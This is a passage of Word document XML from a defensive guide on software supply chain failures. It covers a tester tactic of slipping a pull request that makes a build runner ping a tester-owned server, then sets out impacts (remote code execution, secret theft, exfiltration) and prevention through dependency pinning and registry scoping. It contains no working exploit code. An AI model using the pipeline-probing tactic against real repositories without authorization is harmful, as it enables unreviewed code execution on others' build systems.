    <w:p w14:paraId="10054947" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Tactic:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Testers check if a repository lacks branch protection rules or mandatory peer code reviews.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D8F4B2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Action:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> They attempt to submit a subtle pull request that introduces a dependency change or updates an internal build utility to execute a benign validation command (like pinging a tester-owned server). If the change automatically triggers and executes on a build runner without requiring human oversight, the pipeline's lack of separation of duty is fully confirmed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F302A94" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Impact Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DE4868" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>1. Technical Impact: System &amp; Data Damages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8C930D"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">The technical blast radius of a Software Supply Chain Failure is incredibly high because compromises occur </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>before</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> runtime protections or perimeter firewalls can evaluate the threat. Once a dependency is poisoned, the execution happens natively inside the production core:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF22852" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Total Remote Code Execution (RCE) &amp; Host Takeover:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Because external libraries run with the same execution context as the parent application, a compromised dependency can execute arbitrary system commands, spawn reverse shells, or deploy backdoors directly on the application host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6701C062" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Widespread Pipeline Contamination &amp; Self-Propagation:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If a malicious package is introduced to a developer's local machine or build pipeline runner, it can scan for environment secrets, extract code signing certificates, and automatically push infected code updates up to other private company repositories—turning an internal server into an active vector of infection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493E4D56" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Mass Silent Data Exfiltration:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Malicious snippets embedded in deep transitive dependencies often do not crash the application; they run silently in the background. They can intercept runtime variables, scrape database credentials, and quietly funnel confidential customer files or payment details out to attacker-controlled servers over standard, seemingly benign web traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7629BEFF" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Widespread Ransomware &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Cryptomining</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Infrastructure Deployment:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Outdated or unmaintained components left vulnerable to public exploits (such as Log4Shell) act as universal entry points. Attackers use these gaps to deploy automated scripts that encrypt local filesystems for ransom or harness the company's computing clusters to mine cryptocurrency, leading to severe system performance degradation or total server downtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9125E9" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>2. Business Impact: Real-World Consequences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D683D6C"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When a supply chain failure occurs, the business impact is rarely contained to a single product line; it strikes at the core of an organization's operational viability and corporate reputation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53095A02" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Systemic Operational Shutdowns:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the compromised element sits within vital build tools or cloud-native orchestration images, the entire development and deployment pipeline must be frozen immediately. Fixing a deeply nested dependency problem can bring a company’s software delivery capabilities to a standstill for days or weeks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CEEFA5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Severe Financial Liabilities &amp; Regulatory Violations:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Inheriting a breach through a third-party library does not absolve a company of its regulatory obligations. Under frameworks like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>GDPR</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>HIPAA</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , organizations are legally responsible for the security of the data they process. Leaving open doors via unmaintained </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>components results in massive data breaches, triggering millions in non-compliance fines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CC5C84" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Irreparable Brand &amp; Ecosystem Distrust:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If an organization unknowingly distributes a poisoned software update to its </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>own</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> clients (acting as a secondary vector in a supply chain attack), customer trust evaporates overnight. The company transitions instantly from a victim of a cyberattack into an active, untrusted threat to its own enterprise ecosystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C060A0C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Catastrophic Remediation Costs:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cleaning up a supply chain breach requires massive forensic investigation, continuous log scraping, total key/secret rotations across all cloud platforms, and extensive manual engineering overhauls to systematically rebuild compromised container images and servers from pristine, clean baselines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBC3CE1" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167891BB" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>1. Secure Coding Practices &amp; Controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7B6E81"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Preventing Software Supply Chain Failures requires moving away from the assumption that open-source code is inherently safe. Developers must embed strict verification mechanisms directly into their dependency provisioning and application logic from day one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4B0DD9" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enforce Immutable Dependency Pinning with Cryptographic Hashing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465F2682" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Never use dynamic version wildcards (like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>^</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>latest</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) in project manifests. Instead, lock down the exact version and enforce a sub-resource integrity check using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>lockfiles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ( </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>package-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>lock.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>poetry.lock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>go.sum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B55198D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">For pipeline integration, pin third-party build actions using their specific </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>SHA-256/SHA-1 git commit hashes</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> rather than mutable tags. A version tag like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>v2</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be silently reassigned by a compromised vendor repo, but a unique commit hash cannot be altered without changing the code's cryptographic identity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC20546" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Implement Registry Scoping &amp; Private Proxies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20511A1C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">To eliminate </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Dependency Confusion</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacks, developers must explicitly define internal repository routing namespaces using scoped packages (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
